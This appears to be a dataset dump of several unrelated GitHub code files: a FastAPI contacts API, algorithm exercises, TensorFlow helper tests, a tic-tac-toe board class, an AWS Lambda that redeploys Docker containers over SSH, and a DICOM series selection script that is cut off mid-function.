personaDB.apellido,\n \"contactos\": [{\"tipoContacto\": contactoDB.tipoContacto,\n \"valor\": contactoDB.valor} for contactoDB in personaDB.contactos]\n }\n except Exception as e:\n return {\"error\" : str(e)}\n\n@router.put(\"/agregarDireccion\")\nasync def agregar_direccion(contacto: contactoJson, user: str = Depends(checkear_logueo)):\n try:\n with Session(engine) as sesion: \n personaDB = sesion.query(Persona).filter(Persona.id == contacto.idPersona).first()\n if personaDB is None:\n return {\"message\": \"No se ha encontrado la persona\"}\n else:\n contactoDB = Contacto(tipoContacto=\"Direccion\", valor=contacto.valor)\n personaDB.contactos.append(contactoDB)\n sesion.commit()\n sesion.refresh(personaDB)\n\n return {\"message\": \"Direccion agregada a la persona\",\n \"id\": personaDB.id,\n \"nombre\": personaDB.nombre,\n \"apellido\": personaDB.apellido,\n \"contactos\": [{\"tipoContacto\": contactoDB.tipoContacto,\n \"valor\": contactoDB.valor} for contactoDB in personaDB.contactos]\n }\n except Exception as e:\n return {\"error\" : str(e)}\n\n@router.delete(\"/{idContacto}\")\nasync def eliminar_contacto(idContacto: int, user: str = Depends(checkear_logueo)):\n try:\n with Session(engine) as sesion:\n contactoDB = sesion.query(Contacto).filter(Contacto.id == idContacto).first()\n if contactoDB is None:\n return {\"message\": \"No se ha encontrado el contacto\"}\n else:\n sesion.delete(contactoDB)\n sesion.commit()\n return {\"message\": \"Contacto eliminado\"}\n except Exception as e:\n return {\"error\" : str(e)}\n","repo_name":"tgandini/ApiAgenda","sub_path":"Routers/Contacto.py","file_name":"Contacto.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23189071767","text":"'''\nDesign an algorithm to encode a list of strings to a string. The encoded string is then sent over the network and is decoded\nback to original list of strings. Please inplement encode and decode\n\nInput = [\"lint\", \"code\", \"love\", \"you\"]\nOutput = [\"lint\", \"code\", \"love\", \"you\"]\none possible encode method eis: \"lint:;code:;loce:;you\"\n\n'''\ndef encode(strs):\n res = \"\"\n for s in strs:\n res += str(len(s)) + \"#\" + s\n return res\n\nprint(encode([\"lint\", \"code\", \"love\", \"you\"]))\n\ndef decode(s):\n res = []\n i = 0\n\n while i < len(s):\n j = i\n while s[j] != \"#\":\n j += 1\n length = int(s[i:j])\n res.append(s[j + 1 : j + 1 + length])\n i = j + 1 + length\n return res\n\nprint(decode(\"4#lint4#code4#love3#you\"))\n\n\n\n\n\n\n\n","repo_name":"aliceboone/Phyton","sub_path":"NeetCode/Array/7-encode_decode.py","file_name":"7-encode_decode.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33131766327","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom tensorflow_constrained_optimization.python.rates import helpers\n\n# These tests use some placeholder Tensors, so we want to make sure that they\n# execute in graph mode.\ntf.compat.v1.disable_eager_execution()\n\n\nclass HelpersTest(tf.test.TestCase):\n \"\"\"Tests for helper functions in helpers.py.\"\"\"\n\n def test_convert_to_1d_tensor(self):\n \"\"\"Tests the \"convert_to_1d_tensor\" function.\"\"\"\n self.assertFalse(tf.executing_eagerly())\n\n # Trying to make a rank-1 Tensor from a 0d Tensor should succeed.\n expected = [2.7]\n actual = helpers.convert_to_1d_tensor(2.7)\n with self.session() as session:\n self.assertAllClose(expected, session.run(actual), rtol=0, atol=1e-6)\n\n # Trying to make a rank-1 Tensor from a rank-1 Tensor should succeed.\n expected = [-6.3, 1.0, 5.1]\n actual = helpers.convert_to_1d_tensor(expected)\n with self.session() as session:\n self.assertAllClose(expected, session.run(actual), rtol=0, atol=1e-6)\n\n # Trying to make a rank-1 Tensor from a shape-(1,2,1) Tensor should succeed\n # (only one of the dimensions is nontrivial).\n expected = [3.6, -1.7]\n actual = helpers.convert_to_1d_tensor([[[3.6], [-1.7]]])\n with self.session() as session:\n self.assertAllClose(expected, session.run(actual), rtol=0, atol=1e-6)\n\n # Trying to make a rank-1 Tensor from a shape-(1,None,1) Tensor should\n # succeed (only one of the dimensions is nontrivial).\n expected = [0.2, -2.4, 0.0]\n placeholder = tf.compat.v1.placeholder(tf.float32, shape=(1, None, 1))\n actual = helpers.convert_to_1d_tensor(placeholder)\n with self.session() as session:\n self.assertAllClose(\n expected,\n session.run(\n actual, feed_dict={placeholder: [[[0.2], [-2.4], [0.0]]]}),\n rtol=0,\n atol=1e-6)\n\n # Trying to make a rank-1 Tensor from a rank-2 Tensor should fail.\n with self.assertRaises(ValueError):\n _ = helpers.convert_to_1d_tensor([[1, 2], [3, 4]])\n\n # Trying to make a rank-1 Tensor from a shape-(None,2) Tensor should fail.\n placeholder = tf.compat.v1.placeholder(tf.float32, shape=(None, 2))\n with self.assertRaises(ValueError):\n _ = helpers.convert_to_1d_tensor(placeholder)\n\n def test_get_num_columns_of_2d_tensor(self):\n \"\"\"Tests the \"get_num_columns_of_2d_tensor\" function.\"\"\"\n self.assertFalse(tf.executing_eagerly())\n\n # Trying to get the number of columns from a non-tensor should fail.\n with self.assertRaises(TypeError):\n _ = helpers.get_num_columns_of_2d_tensor([[1, 2], [3, 4]])\n\n # Trying to get the number of columns from a rank-1 tensor should fail.\n tensor = tf.convert_to_tensor([1, 2, 3, 4])\n with self.assertRaises(ValueError):\n _ = helpers.get_num_columns_of_2d_tensor(tensor)\n\n # Make sure that we successfully get the number of columns.\n tensor = tf.convert_to_tensor([[1, 2, 3]])\n self.assertEqual(3, helpers.get_num_columns_of_2d_tensor(tensor))\n\n def test_get_num_elements_of_tensor(self):\n \"\"\"Tests the \"get_num_elements_of_tensor\" function.\"\"\"\n self.assertFalse(tf.executing_eagerly())\n\n # Trying to get the number of elements of a non-tensor should fail.\n with self.assertRaises(TypeError):\n _ = helpers.get_num_elements_of_tensor([[1, 2], [3, 4]])\n\n # Trying to get the number of elements of a tensor with unknown shape should\n # fail.\n tensor = tf.compat.v1.placeholder(tf.float32, shape=None)\n with self.assertRaises(ValueError):\n _ = helpers.get_num_elements_of_tensor(tensor)\n\n # Trying to get the number of elements of a tensor with partially-unknown\n # shape should fail.\n tensor = tf.compat.v1.placeholder(tf.float32, shape=(1, None, 1))\n with self.assertRaises(ValueError):\n _ = helpers.get_num_elements_of_tensor(tensor)\n\n # Make sure that we successfully get the number of elements.\n tensor = tf.convert_to_tensor([[1, 2, 3], [4, 5, 6]])\n self.assertEqual(6, helpers.get_num_elements_of_tensor(tensor))\n\n\nclass UniqueListTest(tf.test.TestCase):\n \"\"\"Tests for `UniqueList` classes.\"\"\"\n\n def test_construct(self):\n \"\"\"Tests the `UniqueList` constructor.\"\"\"\n element1 = 1\n element2 = 2\n element3 = element1\n element4 = 4\n element5 = element4\n element6 = 6\n\n unique_list = helpers.UniqueList(\n [element1, element2, element3, element4, element5, element6])\n self.assertEqual(4, len(unique_list))\n self.assertEqual([element1, element2, element4, element6], unique_list.list)\n\n def test_append_raises(self):\n \"\"\"Tests that \"append\" raises when given the wrong type.\"\"\"\n unique_list = helpers.UniqueList(element_type=list)\n self.assertEqual(0, len(unique_list))\n self.assertEqual([], unique_list.list)\n\n with self.assertRaises(TypeError):\n # Since we passed element_type=list to the UniqueList constructor,\n # attempting to add any non-list should raise.\n unique_list.append(42)\n\n def test_add(self):\n \"\"\"Tests `UniqueList`'s \"__add__\" method.\"\"\"\n element1 = 1\n element2 = 2\n element3 = element1\n element4 = 4\n element5 = element4\n element6 = 6\n\n lhs = [element1, element2]\n rhs = [element3, element4, element5, element6]\n\n unique_list = helpers.UniqueList(lhs)\n self.assertEqual(2, len(unique_list))\n self.assertEqual([element1, element2], unique_list.list)\n\n unique_list += rhs\n self.assertEqual(4, len(unique_list))\n self.assertEqual([element1, element2, element4, element6], unique_list.list)\n\n def test_radd(self):\n \"\"\"Tests `UniqueList`'s \"__radd__\" method.\"\"\"\n element1 = 1\n element2 = 2\n element3 = element1\n element4 = 4\n element5 = element4\n element6 = 6\n\n lhs = [element1, element2]\n rhs = [element3, element4, element5, element6]\n\n unique_list = helpers.UniqueList(rhs)\n self.assertEqual(3, len(unique_list))\n self.assertEqual([element1, element4, element6], unique_list.list)\n\n unique_list = lhs + unique_list\n self.assertEqual(4, len(unique_list))\n self.assertEqual([element1, element2, element4, element6], unique_list.list)\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","repo_name":"google-research/tensorflow_constrained_optimization","sub_path":"tensorflow_constrained_optimization/python/rates/helpers_test.py","file_name":"helpers_test.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"77"} +{"seq_id":"21037494044","text":"from itertools import permutations\nfrom sys import stdin\nN = int(stdin.readline())\nnum = list(map(int, stdin.readline().split()))\noperator = list(map(int,stdin.readline().split()))\nops = ['+','-','*','/']\n\nop = []\nfor i in range(4) :\n if(operator[i] != 0) :\n op.extend([ops[i]]*operator[i])\n\n_min = 1000000001\n_max = -1000000001\nfor perm in permutations(op, N-1) :\n n = num[0]\n for i in range(N-1) : \n if(perm[i] == '+') : \n n = n + num[i+1]\n if(perm[i] == '-') : \n n = n - num[i+1]\n if(perm[i] == '*') : \n n = n * num[i+1]\n if(perm[i] == '/') : \n if(n < 0) :\n n = ((n*-1) // num[i+1])*-1\n else :\n n = n // num[i+1]\n _min = min(_min, n) \n _max = max(_max, n)\n\nprint(_max)\nprint(_min)\n\n \n\n\n","repo_name":"chaeeon-lim/ProgrammingLearners","sub_path":"hyobin/Intermediate_Algorithm/bruteforce_permutation/Operator_1339.py","file_name":"Operator_1339.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17296825712","text":"# This file contains the AWS Lambda function that programmatically redeploys docker containers on the EC2 instances serving\n# the Flask and React apps. The Lambda function is triggered when the docker images for the aforementioned containers\n# build successfully on DockerHub.\n\n# How I created the Lambda deployment package (ZIP File):\n# To use paramiko in AWS Lambda, Lambda must be provided with a ZIP file containing all the needed dependencies.\n# This ZIP file was created by zipping the site-packages folder of a python virtual environment (which\n# contains paramiko and its dependencies). To prevent any binary incompatibility issues arising from differing machine\n# architectures, this virtual environment was created on an EC2 instance that uses the same execution environment\n# as AWS Lambda. The AMI name for this execution environment is 'amzn-ami-hvm-2017.03.1.20170812-x86_64-gp2'\n\nimport boto3\nimport paramiko\nimport os\nimport json\nfrom base64 import b64decode\n\nENCRYPTED_REACT_HOST = os.environ['ec2_react_host']\nDECRYPTED_REACT_HOST = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED_REACT_HOST))['Plaintext']\n\nENCRYPTED_FLASK_HOST = os.environ['ec2_flask_host']\nDECRYPTED_FLASK_HOST = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED_FLASK_HOST))['Plaintext']\n\ndef lambda_handler(event, context):\n\n # Download private key file from secure S3 bucket\n s3_client = boto3.client('s3')\n s3_client.download_file('odc-gear','odc.pem', '/tmp/odc.pem')\n k = paramiko.RSAKey.from_private_key_file(\"/tmp/odc.pem\")\n\n ###########################################################\n\n # SSH into EC2 instance serving the React application and stop, remove, update, and rerun docker container.\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(hostname=DECRYPTED_REACT_HOST, username=\"ubuntu\", pkey=k)\n commands = [\n # React front-end deployment\n 'sudo docker stop react-front-end',\n 'sudo docker rm react-front-end',\n 'sudo docker rmi zakinator123/gear-tracker-frontend:latest',\n 'sudo docker pull zakinator123/gear-tracker-frontend',\n 'sudo docker run -d --name react-front-end -p 8080:80 zakinator123/gear-tracker-frontend',\n 'sudo service haproxy restart',\n ]\n\n # Execute the commands on the instance\n for command in commands:\n stdin, stdout, stderr = client.exec_command(command)\n print(stdout.read())\n print(stderr.read())\n client.close()\n\n ###########################################################\n\n # SSH into EC2 instance serving the Flask application and stop, remove, update, and rerun docker container.\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(hostname=DECRYPTED_FLASK_HOST, username=\"ubuntu\", pkey=k)\n commands = [\n # Flask back-end deployment\n \"sudo docker stop odc\",\n \"sudo docker rm odc\",\n \"sudo docker rmi zakinator123/gear-tracker-backend:latest\",\n 'sudo docker pull zakinator123/gear-tracker-backend',\n 'sudo docker pull zakinator123/gear-tracker-flyway',\n 'sudo docker run --name flyway --link mysql --env-file ~/flyway_env_vars zakinator123/gear-tracker-flyway -connectRetries=60 migrate',\n 'sudo docker rm gear-tracker-flyway',\n \"sudo docker run -d --name odc --link mysql -p 8080:80 --env-file ./env_vars zakinator123/gear-tracker-backend\",\n \"sudo service haproxy restart\",\n ]\n\n # Execute the commands on the instance\n for command in commands:\n stdin, stdout, stderr = client.exec_command(command)\n print(stdout.read())\n print(stderr.read())\n client.close()\n\n ###########################################################\n\n message = {\n \"statusCode\": 200,\n \"headers\": {\"Content-Type\": \"application/json\"},\n \"body\": json.dumps({\"message\": \"Success!\"}),\n \"isBase64Encoded\": False\n }\n\n return message","repo_name":"Zakinator123/Gear-Tracker","sub_path":"miscellaneous/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6727153975","text":"from collections import deque\nn,m = map(int,input().split())\ngraph = [list(map(int,input())) for _ in range(n)]\n\n#방향 상하좌우\ndx = [-1,1,0,0]\ndy = [0,0,-1,1]\n\n\ndef bfs(x,y):\n queue = deque()\n queue.append((x,y))\n graph[x][y]=0\n while(queue):\n x,y = queue.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if nx<0 or ny<0 or nx>n-1 or ny>m-1 or graph[nx][ny]==0:\n continue\n if graph[nx][ny] == 1: # 방문을 한 것들은 이미 +n이 되어있다 그래프 값 자체가 최단거리로 평가\n graph[nx][ny] = graph[x][y]+1\n queue.append((nx,ny))\n \n return graph[n-1][m-1] \n\nprint(bfs(0,0)+1)\n \n \n","repo_name":"leehanjun506/Algorithm","sub_path":"PSwithNaDongBin/DFS,BFS/prac_2.py","file_name":"prac_2.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20083447823","text":"import numpy as np\r\n\r\n\r\nclass Board:\r\n\r\n P1 = -1\r\n P2 = -2\r\n DRAW = -3\r\n NO_WIN = 0\r\n\r\n MOVE_SUCCESS = 0\r\n MOVE_INVALID = 1\r\n \r\n def __init__(self, shape):\r\n \"\"\" Initialise board of a specified size. \"\"\"\r\n\r\n self.board_shape = shape # Easier to store instead of calling self.board.shape[0]\r\n \r\n res = []\r\n for i in range(shape):\r\n res.append(np.arange(shape*i, shape*(i+1)))\r\n\r\n self.board = np.array(res)\r\n self.board += 1\r\n\r\n self.num_moves = 0\r\n \r\n \r\n def make_copy(self):\r\n \"\"\" Return a copy of a board instance. Used for minimax.\"\"\"\r\n\r\n new_board = Board(self.board_shape)\r\n new_board.board = np.copy(self.board)\r\n new_board.num_moves = self.num_moves\r\n return new_board\r\n\r\n\r\n def print_board(self):\r\n \"\"\" Pretty printing for the board object instance. \"\"\"\r\n\r\n def to_symbol(symbol):\r\n if symbol == Board.P1: return 'X'\r\n elif symbol == Board.P2: return 'O'\r\n else: return symbol\r\n\r\n for index, row in enumerate(self.board): \r\n print(\" | |\")\r\n print(\" \" + str(to_symbol(row[0])) + \" | \" + str(to_symbol(row[1])) + \" | \" \r\n + str(to_symbol(row[2])) )\r\n print(\" | |\")\r\n\r\n if index == self.board_shape - 1:\r\n break\r\n\r\n print(\"----------------\")\r\n\r\n def get_empty_squares(self):\r\n \"\"\" Return a list of the empty squares on this board.\"\"\"\r\n empty_squares = []\r\n for position in self.board.flat:\r\n if position != Board.P1 and position != Board.P2:\r\n empty_squares.append(position)\r\n\r\n return empty_squares\r\n\r\n\r\n\r\n\r\n def make_move(self, position, symbol):\r\n \"\"\" \r\n Attempt to make move on board object given a position number and a symbol to go there.\r\n :param int position: numbers 1 to 9\r\n Returns:\r\n MOVE_SUCCESS if valid move.\r\n MOVE_INVALID if invalid move.\r\n \"\"\"\r\n # Flatten board so we can just directly use position number.\r\n self.board = self.board.flatten()\r\n\r\n # Check that position is empty so we can actually place something \r\n if self.board[position - 1] == position:\r\n self.board[position - 1] = symbol\r\n self.board = self.board.reshape(self.board_shape, self.board_shape)\r\n self.num_moves += 1 \r\n return Board.MOVE_SUCCESS\r\n \r\n else:\r\n # Invalid move: position not free.\r\n self.board = self.board.reshape(self.board_shape, self.board_shape) \r\n return Board.MOVE_INVALID \r\n\r\n\r\n\r\n\r\n \r\n def check_for_win(self):\r\n \"\"\"\r\n Check board for winning position.\r\n \r\n Returns:\r\n Board.P1 if player 1 (X) has won\r\n Board.P2 if player 2 (O) has won \r\n Board.DRAW if draw\r\n Board.NO_WIN if inconclusive\r\n\r\n \"\"\"\r\n\r\n # Check each row for a win\r\n for row in self.board:\r\n if np.all(row == Board.P1): return Board.P1\r\n if np.all(row == Board.P2): return Board.P2 \r\n\r\n # Check columns\r\n for row in self.board.T:\r\n if np.all(row == Board.P1): return Board.P1\r\n if np.all(row == Board.P2): return Board.P2\r\n\r\n # Check diagonals\r\n diag1 = np.diagonal(self.board)\r\n diag2 = np.diagonal(np.fliplr(self.board))\r\n\r\n if np.all(diag1 == Board.P1): return Board.P1\r\n if np.all(diag1 == Board.P2): return Board.P2 \r\n if np.all(diag2 == Board.P1): return Board.P1\r\n if np.all(diag2 == Board.P2): return Board.P2 \r\n\r\n if self.num_moves == (self.board_shape * self.board_shape):\r\n return Board.DRAW\r\n\r\n return Board.NO_WIN \r\n","repo_name":"mwall-dev/ticTacToeAI","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42696370677","text":"script_version = 1.0\n\n# Imports\nimport argparse\nimport os\nimport sys\nimport vtk\nimport SimpleITK as sitk\nfrom datetime import date\nfrom ogo.util.echo_arguments import echo_arguments\nimport ogo.util.Helper as ogo\nimport queue\nimport re\nimport collections\nimport pandas as pd\nimport datetime\n\n# +------------------------------------------------------------------------------+\n# Writer\ndef write(entry, deliminator, ofile):\n if ofile is None:\n output = os.sys.stdout\n else:\n if os.path.isfile(ofile):\n output = open(ofile, 'a')\n else:\n output = open(ofile, 'w')\n output.write(deliminator.join([str(x) for x in write.header]))\n output.write(os.linesep)\n\n output.write(deliminator.join([str(x) for x in entry]))\n output.write(os.linesep)\n\n if output is not os.sys.stdout:\n output.close()\n\n# +------------------------------------------------------------------------------+\n# Various selection criteria for sorting to find the best image series\ndef try_by_modality(df):\n keywords = ['CT']\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['Modality'].str.contains(keyword, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, keyword, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_image_type(df):\n keywords = ['PRIMARY'] # If we can't get PRIMARY...\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['ImageType'].str.contains(keyword, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, keyword, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_study_description(df):\n keywords = ['ABD','PELVIS','BODY','CHEST'] # If we can't get ABDOMEN, then get PELVIS, then BODY, etc\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['StudyDescription'].str.contains(keyword, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, keyword, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n \ndef try_by_series_description(df):\n keywords = ['ABD','PEL','CHEST','Chest','AP','WB','Lung','LUNG','BODY','Body'] # If we can't get ABDOMEN, then get PELVIS, then CHEST, etc.\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['SeriesDescription'].str.contains(keyword, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, keyword, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n \ndef try_by_slice_thickness(df): # If we can't get 1.0mm, then get 2.0mm, etc.\n #slice_thicknesses = [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0]\n slice_thicknesses = [3.0]\n \n for slice_thickness in slice_thicknesses:\n tmp_reduced_df = df.loc[(df['SliceThickness'] <= slice_thickness)]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, slice_thickness, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_series_number(df): # Only accept series \n acceptable_series_numbers = [50]\n \n for series_number in acceptable_series_numbers:\n tmp_reduced_df = df.loc[(df['SeriesNumber'] < series_number)]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, series_number, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_number_of_images(df): # If we can't get 1000 slices, then get 900, etc.\n #images_in_series = [1000, 900, 800, 700, 600, 500, 400, 300, 250, 200, 150, 100, 50]\n images_in_series = [300, 200, 100]\n \n for n_images in images_in_series:\n tmp_reduced_df = df.loc[(df['NumberOfReferences'] >= n_images)]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, n_images, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef try_by_pixel_spacing(df): # If we can't get 0.5mm, then get 0.6mm, etc.\n #pixel_spacings = ['0.5', '0.6', '0.7', '0.8', '0.9', '1.0', '1.5']\n pixel_spacings = ['1.0', '1.5']\n \n for pixel_spacing in pixel_spacings:\n tmp_reduced_df = df.loc[(df['PixelSpacing'].str.contains(pixel_spacing, na=False))]\n \n if tmp_reduced_df.shape[0] > 0:\n return tmp_reduced_df, pixel_spacing, tmp_reduced_df.shape[0]\n \n tmp_reduced_df = df\n return tmp_reduced_df, 'NOT FOUND', tmp_reduced_df.shape[0]\n\ndef exclude_by_series_description(df,keywords):\n \n for keyword in keywords:\n tmp_reduced_df = df.loc[(df['SeriesDescription'].str.contains(keyword, na=False, case=False) == False)]\n df = tmp_reduced_df\n \n return tmp_reduced_df, '('+','.join('{}'.format(k) for k in keywords)+')', tmp_reduced_df.shape[0] \n \ndef exclude_by_number_of_images(df,n_images):\n \n tmp_reduced_df = df.loc[(df['NumberOfReferences'] >= n_images)]\n \n return tmp_reduced_df, '(min={})'.format(n_images), tmp_reduced_df.shape[0]\n\ndef exclude_by_slice_thickness(df,slice_thickness):\n \n tmp_reduced_df = df.loc[(df['SliceThickness'] <= slice_thickness)]\n \n return tmp_reduced_df, '(Th={:.2f})'.format(slice_thickness), tmp_reduced_df.shape[0]\n\n# +------------------------------------------------------------------------------+\n# Sort scans\ndef DicomSelector(csvfile,output,minNumberSlices,maxSliceThickness,overwrite):\n \n exclude_keywords = ['NECK','CTNKE','CTHDE','HEAD','LEGS'] # Add CHEST, LUNG, MPR, LIVER?\n \n # Check for valid input\n if os.path.splitext(csvfile)[1].lower() not in '.csv':\n ogo.message('[ERROR] Valid CSV file has not been provided. File provided:')\n ogo.message(' {}'.format(csvfile))\n os.sys.exit()\n \n # Check if output report exists and should overwrite\n if output:\n if os.path.isfile(output) and not overwrite:\n result = input('File \\\"{}\\\" already exists. Overwrite? [y/n]: '.format(output))\n if result.lower() not in ['y', 'yes']:\n ogo.message('Not overwriting. Exiting...')\n os.sys.exit()\n else:\n output = os.path.splitext(csvfile)[0] + '_selected.csv'\n if os.path.isfile(output) and not overwrite:\n result = input('File \\\"{}\\\" already exists. Overwrite? [y/n]: '.format(output))\n if result.lower() not in ['y', 'yes']:\n ogo.message('Not overwriting. Exiting...')\n os.sys.exit()\n output_pull = os.path.splitext(output)[0] + '.sh'\n\n ogo.message('Results will be output to {}'.format(output))\n\n ogo.message('Begin sorting...')\n \n debugging = False\n \n # Get all the names of exams into a sorted list\n csvData = pd.read_csv(csvfile)\n name_list = csvData['Name'].tolist()\n name_list = list(set(name_list))\n name_list.sort()\n \n # Sort data frame\n ogo.message('Put the data into order by Name, Date, Slices, Slice Thickness...')\n csvData.sort_values([\"Name\", \"AcquisitionDate\", \"NumberOfReferences\", \"SliceThickness\"], \n axis=0,\n ascending=[True, True, False, True], \n inplace=True)\n \n ogo.message('Dataframe size is {}.'.format(csvData.shape[0]))\n ogo.message('')\n\n sorted_df = pd.DataFrame([]) # Used to collect the selected series\n \n # Begin sorting one name at a time\n for idx, name in enumerate(name_list):\n \n name_csvData = csvData.loc[csvData['Name'].str.contains(name,case=False)]\n \n date_list = name_csvData['AcquisitionDate'].tolist()\n date_list = list(set(date_list))\n date_list = [x for x in date_list if str(x) != 'nan'] # cleans date list of nan values\n date_list.sort()\n \n for this_date in date_list:\n reduced_df = name_csvData.loc[(name_csvData['AcquisitionDate'] == this_date)]\n n_series = reduced_df.shape[0]\n ogo.message('{:22s} {:>10s} {:>10s}'.format(name,this_date,'N'))\n ogo.message(' {:20s} {:>10s} {:>10d}'.format('Start',' ',n_series))\n \n # Exclude based on Number of Images (slices)\n if n_series > 1:\n reduced_df, val, n_series = exclude_by_number_of_images(reduced_df,minNumberSlices)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('NumberOfImages',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Exclude based on Slice Thickness\n if n_series > 1:\n reduced_df, val, n_series = exclude_by_slice_thickness(reduced_df,maxSliceThickness)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('SliceThickness',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Exclude based on Series Description\n if n_series > 1:\n reduced_df, val, n_series = exclude_by_series_description(reduced_df,exclude_keywords)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('SeriesDescription',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n ## Include by Modality\n #if n_series > 1:\n # reduced_df, val, n_series = try_by_modality(reduced_df)\n # ogo.message(' {:20s} {:>10s} {:>10d}'.format('Modality',val,reduced_df.shape[0]))\n #if debugging:\n # print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n # \n ## Include by Slice Thickness\n #if n_series > 1:\n # reduced_df, val, n_series = try_by_slice_thickness(reduced_df)\n # ogo.message(' {:20s} {:>10} {:>10d}'.format('SliceThickness',val,reduced_df.shape[0]))\n #if debugging:\n # print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n #\n ## Pixel Spacing\n #if n_series > 1:\n # reduced_df, val, n_series = try_by_pixel_spacing(reduced_df)\n # ogo.message(' {:20s} {:>10} {:>10d}'.format('PixelSpacing',val,reduced_df.shape[0]))\n #if debugging:\n # print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n ogo.message(' {:20s} {:>10s} {:>10d}'.format('Finish',' ',n_series))\n \n \n if False:\n # Study Description\n if n_series > 1:\n reduced_df, val, n_series = try_by_study_description(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('StudyDescription',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Series Description\n if n_series > 1:\n reduced_df, val, n_series = try_by_series_description(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('SeriesDescription',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Series Number\n if n_series > 1:\n reduced_df, val, n_series = try_by_series_number(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('SeriesNumber',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Image Type\n if n_series > 1:\n reduced_df, val, n_series = try_by_image_type(reduced_df)\n ogo.message(' {:20s} {:>10} {:>10d}'.format('ImageType',val,reduced_df.shape[0]))\n if debugging:\n print(reduced_df.loc[:,[\"SeriesNumber\",\"NumberOfReferences\",\"SeriesDescription\",\"SliceThickness\",\"PixelSpacing\"]])\n \n # Number of Images\n if n_series > 1:\n reduced_df, val, n_series = 